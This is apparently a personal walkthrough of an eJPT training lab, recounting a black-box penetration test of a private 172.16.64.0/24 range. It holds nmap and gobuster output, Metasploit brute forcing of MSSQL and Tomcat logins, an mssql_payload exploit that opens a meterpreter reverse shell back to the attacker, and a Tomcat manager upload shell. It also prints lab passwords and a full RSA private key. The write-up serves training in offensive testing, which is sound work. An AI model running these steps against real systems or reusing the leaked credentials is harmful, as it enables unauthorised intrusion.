Info
Scenario
You have been engaged in a Black-box Penetration Test (172.16.64.0/24 range). Your goal is to read the flag file on each machine. On some of them, you will be required to exploit a remote code execution vulnerability in order to read the flag.
Some machines are exploitable instantly but some might require exploiting other ones first. Enumerate every compromised machine to identify valuable information, that will help you proceed further into the environment.
If you are stuck on one of the machines, don't overthink and start pentesting another one.
When you read the flag file, you can be sure that the machine was successfully compromised. But keep your eyes open - apart from the flag, other useful information may be present on the system.
This is not a CTF! The flags' purpose is to help you identify if you fully compromised a machine or not.
The solutions contain the shortest path to compromise each machine. You should follow the penetration testing process covered in its entirety!
Goals
Discover and exploit all the machines on the network.
Read all flag files (one per machine)
What you will learn
How to exploit Apache Tomcat
How to exploit SQL Server
Post-exploitation discovery
Arbitrary file upload exploitation
Recommended tools
Dirb
Metasploit framework (recommended version: 5)
Nmap
Netcat
Approach
First of, I connected to the VPN and started with a NMAP scan of the entire range.
Nmap scan report for 172.16.64.101
Host is up (0.27s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.182
Host is up (0.30s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA)
| 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA)
|_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 172.16.64.199
Host is up (0.24s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: WIN10
| NetBIOS_Domain_Name: WIN10
| NetBIOS_Computer_Name: WIN10
| DNS_Domain_Name: WIN10
| DNS_Computer_Name: WIN10
|_ Product_Version: 10.0.10586
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2021-03-02T12:26:47
| Not valid after: 2051-03-02T12:26:47
| MD5: cc88 5bbb d493 b6ab 7a60 0307 b01e a772
|_SHA-1: 806f 0b01 3ab5 2ba9 c848 aa82 e15d 55b4 106e 6374
|_ssl-date: 2021-03-02T17:35:42+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| ms-sql-info:
| 172.16.64.199:1433:
| Version:
| name: Microsoft SQL Server 2014 RTM
| number: 12.00.2000.00
| Product: Microsoft SQL Server 2014
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| nbstat: NetBIOS name: WIN10, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:8e:48:10 (VMware)
| Names:
| WIN10<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WIN10<20> Flags: <unique><active>
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-03-02T17:35:32
|_ start_date: 2021-03-02T12:26:45
Apache Tomcat host
We can see one box (172.16.64.101) is running some Tomcat stuff. So I started up a gobuster to scan those two ports.
Port 8080
kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:8080/ -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://172.16.64.101:8080/
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/02 12:46:38 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 12:54:56 [!] parse http://172.16.64.101:8080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:09:20 Finished
===============================================================
Port 9080
kali@kali:~/ine/eJPT/blackbox1/scans$ gobuster dir -u http://172.16.64.101:9080 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -o 101_9080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://172.16.64.101:9080
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/03/02 12:46:10 Starting gobuster
===============================================================
/manager (Status: 302)
[ERROR] 2021/03/02 13:02:18 [!] parse http://172.16.64.101:9080/error_log: net/url: invalid control character in URL
/host-manager (Status: 302)
===============================================================
2021/03/02 13:34:52 Finished
===============================================================
/manager pop up pretty early on in the scan, so I fired up msfconsole and started to bruteforce username/password to be able to get in.
Tried both 8080 and 9080 without any luck.
Switched to look at the SQL server host.
Jumped over to the Microsoft SQL (172.16.64.199) box to start bruteforcing user/pass combinations on that since I didnβt get any where with the Tomcat stuff. Still using msfconsole:
msf6 auxiliary(scanner/mssql/mssql_login) > show options
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/wordlists/rockyou.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 172.16.64.101 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mssql/mssql_login) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(scanner/mssql/mssql_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt
PASS_FILE => /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/mssql/mssql_login) > run
[*] 172.16.64.199:1433 - 172.16.64.199:1433 - MSSQL - Starting authentication scanner.
[!] 172.16.64.199:1433 - No active DB -- Credential data will not be saved!
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa: (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:123456789 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:password (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:iloveyou (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:princess (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:1234567 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:rockyou (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:12345678 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:abc123 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:nicole (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:daniel (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:babygirl (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:monkey (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:lovely (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:jessica (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:654321 (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:michael (Incorrect: )
[-] 172.16.64.199:1433 - 172.16.64.199:1433 - LOGIN FAILED: WORKSTATION\sa:ashley (Incorrect: )
[+] 172.16.64.199:1433 - 172.16.64.199:1433 - Login Successful: WORKSTATION\sa:qwerty
BOOM! We got a match! Letβs run mssql_enum and see what we have going on here!
msf6 auxiliary(scanner/mssql/mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > show options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_enum) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 auxiliary(admin/mssql/mssql_enum) > set PASSWORD qwerty
PASSWORD => qwerty
msf6 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 172.16.64.199
[*] 172.16.64.199:1433 - Running MS SQL Server Enumeration...
[*] 172.16.64.199:1433 - Version:
[*] Microsoft SQL Server 2014 - 12.0.2000.8 (X64)
[*] Feb 20 2014 20:04:26
[*] Copyright (c) Microsoft Corporation
[*] Express Edition (64-bit) on Windows NT 6.3 <X64> (Build 10586: ) (Hypervisor)
[*] 172.16.64.199:1433 - Configuration Parameters:
[*] 172.16.64.199:1433 - C2 Audit Mode is Not Enabled
[*] 172.16.64.199:1433 - xp_cmdshell is Enabled
[*] 172.16.64.199:1433 - remote access is Enabled
[*] 172.16.64.199:1433 - allow updates is Not Enabled
[*] 172.16.64.199:1433 - Database Mail XPs is Not Enabled
[*] 172.16.64.199:1433 - Ole Automation Procedures are Not Enabled
[*] 172.16.64.199:1433 - Databases on the server:
[*] 172.16.64.199:1433 - Database name:master
[*] 172.16.64.199:1433 - Database Files for master:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\master.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\mastlog.ldf
[*] 172.16.64.199:1433 - Database name:tempdb
[*] 172.16.64.199:1433 - Database Files for tempdb:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\tempdb.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\templog.ldf
[*] 172.16.64.199:1433 - Database name:model
[*] 172.16.64.199:1433 - Database Files for model:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\model.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\modellog.ldf
[*] 172.16.64.199:1433 - Database name:msdb
[*] 172.16.64.199:1433 - Database Files for msdb:
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBData.mdf
[*] 172.16.64.199:1433 - C:\Program Files\Microsoft SQL Server\MSSQL12.FOOSQL\MSSQL\DATA\MSDBLog.ldf
[*] 172.16.64.199:1433 - System Logins on this Server:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - ##MS_SQLResourceSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SQLReplicationSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SQLAuthenticatorCertificate##
[*] 172.16.64.199:1433 - ##MS_PolicySigningCertificate##
[*] 172.16.64.199:1433 - ##MS_SmoExtendedSigningCertificate##
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - ##MS_AgentSigningCertificate##
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - BUILTIN\Users
[*] 172.16.64.199:1433 - NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - jerry
[*] 172.16.64.199:1433 - Disabled Accounts:
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - No Accounts Policy is set for:
[*] 172.16.64.199:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 172.16.64.199:1433 - Password Expiration is not checked for:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - ##MS_PolicyEventProcessingLogin##
[*] 172.16.64.199:1433 - ##MS_PolicyTsqlExecutionLogin##
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - jerry
[*] 172.16.64.199:1433 - System Admin Logins on this Server:
[*] 172.16.64.199:1433 - sa
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - Windows Logins on this Server:
[*] 172.16.64.199:1433 - WIN10\AdminELS
[*] 172.16.64.199:1433 - NT SERVICE\SQLWriter
[*] 172.16.64.199:1433 - NT SERVICE\Winmgmt
[*] 172.16.64.199:1433 - NT SERVICE\MSSQL$FOOSQL
[*] 172.16.64.199:1433 - NT AUTHORITY\SYSTEM
[*] 172.16.64.199:1433 - Windows Groups that can logins on this Server:
[*] 172.16.64.199:1433 - BUILTIN\Users
[*] 172.16.64.199:1433 - Accounts with Username and Password being the same:
[*] 172.16.64.199:1433 - fooadmin
[*] 172.16.64.199:1433 - Accounts with empty password:
[*] 172.16.64.199:1433 - No Accounts with empty passwords where found.
[*] 172.16.64.199:1433 - Stored Procedures with Public Execute Permission found:
[*] 172.16.64.199:1433 - sp_replsetsyncstatus
[*] 172.16.64.199:1433 - sp_replcounters
[*] 172.16.64.199:1433 - sp_replsendtoqueue
[*] 172.16.64.199:1433 - sp_resyncexecutesql
[*] 172.16.64.199:1433 - sp_prepexecrpc
[*] 172.16.64.199:1433 - sp_repltrans
[*] 172.16.64.199:1433 - sp_xml_preparedocument
[*] 172.16.64.199:1433 - xp_qv
[*] 172.16.64.199:1433 - xp_getnetname
[*] 172.16.64.199:1433 - sp_releaseschemalock
[*] 172.16.64.199:1433 - sp_refreshview
[*] 172.16.64.199:1433 - sp_replcmds
[*] 172.16.64.199:1433 - sp_unprepare
[*] 172.16.64.199:1433 - sp_resyncprepare
[*] 172.16.64.199:1433 - sp_createorphan
[*] 172.16.64.199:1433 - xp_dirtree
[*] 172.16.64.199:1433 - sp_replwritetovarbin
[*] 172.16.64.199:1433 - sp_replsetoriginator
[*] 172.16.64.199:1433 - sp_xml_removedocument
[*] 172.16.64.199:1433 - sp_repldone
[*] 172.16.64.199:1433 - sp_reset_connection
[*] 172.16.64.199:1433 - xp_fileexist
[*] 172.16.64.199:1433 - xp_fixeddrives
[*] 172.16.64.199:1433 - sp_getschemalock
[*] 172.16.64.199:1433 - sp_prepexec
[*] 172.16.64.199:1433 - xp_revokelogin
[*] 172.16.64.199:1433 - sp_resyncuniquetable
[*] 172.16.64.199:1433 - sp_replflush
[*] 172.16.64.199:1433 - sp_resyncexecute
[*] 172.16.64.199:1433 - xp_grantlogin
[*] 172.16.64.199:1433 - sp_droporphans
[*] 172.16.64.199:1433 - xp_regread
[*] 172.16.64.199:1433 - sp_getbindtoken
[*] 172.16.64.199:1433 - sp_replincrementlsn
[*] 172.16.64.199:1433 - Instances found on this server:
[*] 172.16.64.199:1433 - FOOSQL
[*] 172.16.64.199:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 172.16.64.199:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
Nice nice. Letβs just smash on with meterpreter and get a shell on this box through MSSQL.
msf6 exploit(windows/mssql/mssql_payload) > use exploit/windows/mssql/mssql_payload
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/mssql/mssql_payload) > show options
Module options (exploit/windows/mssql/mssql_payload):
Name Current Setting Required Description
---- --------------- -------- -----------
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old)
PASSWORD qwerty no The password for the specified username
RHOSTS 172.16.64.199 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
URIPATH no The URI to use for this exploit (default is random)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.16.64.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/mssql/mssql_payload) > set password qwerty
password => qwerty
msf6 exploit(windows/mssql/mssql_payload) > set RHOSTS 172.16.64.199
RHOSTS => 172.16.64.199
msf6 exploit(windows/mssql/mssql_payload) > set LHOST 172.16.64.12
LHOST => 172.16.64.12
msf6 exploit(windows/mssql/mssql_payload) > run
[*] Started reverse TCP handler on 172.16.64.12:4444
[*] 172.16.64.199:1433 - Command Stager progress - 1.47% done (1499/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 2.93% done (2998/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 4.40% done (4497/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 5.86% done (5996/102246 bytes)
.........
.........
[*] 172.16.64.199:1433 - Command Stager progress - 95.29% done (97435/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 172.16.64.199:1433 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Sending stage (175174 bytes) to 172.16.64.199
[*] 172.16.64.199:1433 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 2 opened (172.16.64.12:4444 -> 172.16.64.199:49673) at 2021-03-02 14:07:13 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
So we own this box now! β
We find other useful file on the Desktop as well.
meterpreter > cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:[email protected]:22#############################################################################################################################################################################################meterpreter >
Username and password! developer:[email protected]:22
SSH onto 183 host
Letβs try out the username and password we found in the SQL Server Box!
kali@kali:~/ine/eJPT/blackbox1$ ssh [email protected]
The authenticity of host '172.16.64.182 (172.16.64.182)' can't be established.
ECDSA key fingerprint is SHA256:RENtJS0acPn+bv2Lw6K0XrHov6tFifkbIXQ3kh/NpeE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '172.16.64.182' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-104-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
195 packages can be updated.
10 updates are security updates.
Last login: Sun May 19 05:36:41 2019 from 172.16.64.13
developer@xubuntu:~$
Weβre in! Letβs kick of linpeas here, while we see more on the Tomcat host!
Back to Tomcat
Towards the end /host-manager pop up in gobuster.
Using this we try to bruteforce user/pass combos again, to see if we can get in here instead.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set TARGETURI /host-manager/html
TARGETURI => /host-manager/html
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
Nothing new happended here :/ Maybe itβs just a rabbit hole, and we should get in through creds from the other servers?
Linpeas on .183 is done!
Nothing really intrested that I know about showed up here. There is a id_rsa file here tho, that might work on the Tomcat machine?
developer@xubuntu:~/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAqb8XF/KwvqtPHptin3NbRwwtWznripQn5WNVKcNqJVnk5rN6
uVF5pwdaFhn1pnx4oFdLnDSEAqmQ36xe54q01iuXqH4bkJ10bZyH9kt87ZxTSFs0
/cigSrCOodtCDpRkiCZJQ7t4e67K/54w0LZHFywYVB3GstWBORW3dzcncSRB0VJx
izhgbCZTRydbo8fl+ZaJQP9BdQ/0lNCU2RSXJiLHUa9IDeoBulGwh2tNtM/FM+r3
+CXYS6L6Q1030EYVn7kcMU0Et4gAEDMwCC9i6YPBIKajUKah+uUC/e3GklS7pRSd
2zgX+sPw16zHxPZ6SiqrNMZdmYNvkuO+4Dj/YQIDAQABAoIBAHfd1+nyV/scr69W
XMtqQ2+lWrYL7ZebTZz/ixkFxIQBudFrtmL89OINIAFxbXWWefwICP2SXBIhOYup
hg8NdOu0NtEl1ENH3Pq2SZCT9/E2rdzvgzkfHon/qYkEct4mzeMS3jO1Q7xbT0A4
rhIEVak4WymzKSgJ+smb20WVLgYHRPGStkdTp0s4J1qdKxoIK47wzqT/LqDdrBQU
CawEQvqXnRrtx+fSskov2vTe78Rv2nOndsSYBXfzXi5NbQ67BqUgkvgPa+vOTMj/
dnqEHCkf+SZ9+A3fvGozPtcs6ViL9hN0db464CX7RYtt3jLb4XltqY6dH21pFSm8
UCxYol0CgYEA1Vg9NuBWgxtQENE/NiqwhRgSBcwZB6S1NW5y4kgDDIH/lmsMN6b3
eSj29LYQ6EoQDNh/YmTRDNupllHr5NT+B/rCimkwDpFMuOfwqHYN4AzTcaz5u98j
6HApQas25e43tN61uE2dTPdlMHJqTXasOliVh678LRB3V2FuvYiDft8CgYEAy69V
eYpLrSQk5m/irsMoqWDaxWUrEGA7QVVfm3opibfaxak5m/q2I1sEHMzsPv9b9nJ/
s1uRUmNaEQ2NHmhhzoFOCR+3SiKoKPa6XAO8rRyUJxRFJMHb+JkGCilpKQU4WAs4
atW3swz/mTMmzKKXmk6pxZ79Aj+6S2lyKZfIib8CgYEAvt6v/Y2duLRR4InkXMi6
noiXbzpXVmBEguYqwEme+KzBhsiE6LFnjK1arDrLS5cfXu6+oMADy9Ymlkb6ngL0
txzgucY76XyTQIa5522fIkk3TudrkmqjjIv0TT0p43JJwnbR6279AWQA0uQ6OM2o
bpbcSMUD9ilaLAIOemFNC88CgYAQzsce4GqePv1Mhq8N/My+LV/gKhkDoO1C1uis
y8fhtWo4JV67oFSnVjtgpQhZqnjMPWaMRmIXiltETPn4KGTpxYHK/vMBCxsVRkba
kPRg1JrlHqcWAWlFelslO4WR/PxJR6PALSKbg9cTrUTmXgRkl1krFZOLO/cDghAJ
npzNwQKBgQDNsrGuSDftdys8ytN9WaFL6/ga+lhrS+b3XuCL1jTEH5xsuy42cDPF
ehCvg8gxZ0HTR7aCeFtNAwgvDSeWuKPf9MFKrAVtI8CI4g8fbTceO/QAAOFpLirK
69FAPKHvshjhqn74SB3ymCOV1/NouX72q0B96o5v5IocDI1SWN/aaw==
-----END RSA PRIVATE KEY-----
developer@xubuntu:~/.ssh$
There is an extra box on this network!
NMAP didnβt catch all of the boxes on this network.
There is a host 172.16.64.140 as well, which listens on port 80.
Nothing intresting directly on that address, but running gobuster on it we find a directory called /project which has some kinda site on it.
Might be some SQL injection perhaps? Since there is a search and newsletter signup?
Doing multiple gobuster sessions, we finally end up where there is some interesting files located.
http://172.16.64.140/project/backup/test/
There is a file here with some DB credentials, that we actually should have used on the SQL Server, but we bruteforced the SA password here instead.
sdadas.txt
Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin;
/var/www/html/project/354253425234234/flag.txt
As we see from the file above, there is also a mention about a flag file: http://172.16.64.140/project/354253425234234/flag.txt.
Congratulations, you exploited this machine!
Now continue to others.
Taking a look at Tomcat again after getting a hint
From the βsolutionβ part, we see that tomcat:s3cret should be the username and password we should use. Weβve already tried this, but it also say that if we donβt get in with these the account is mostlikely locked out since we tried to bruteforce itβ¦
Kinda bad tho, in a real world scenario this account would have been locked, we canβt just call up the guys owning the server and ask them to unlock it like the suggestion basically is here (weβre resetting the box).
This is the last box we gotta pwn, so we reset it all.
Using exploit/multi/http/tomcat_mgr_upload in metasploit, with the .101 ip. port 8080, and the username and password tomcat/s3cret we can upload a reverese shell and get the box within seconds.
Didnβt bother to enumerate the box. Got two flags from developer and elmsadmin-somethingβ¦
The objective is probably to get root on it thoβ¦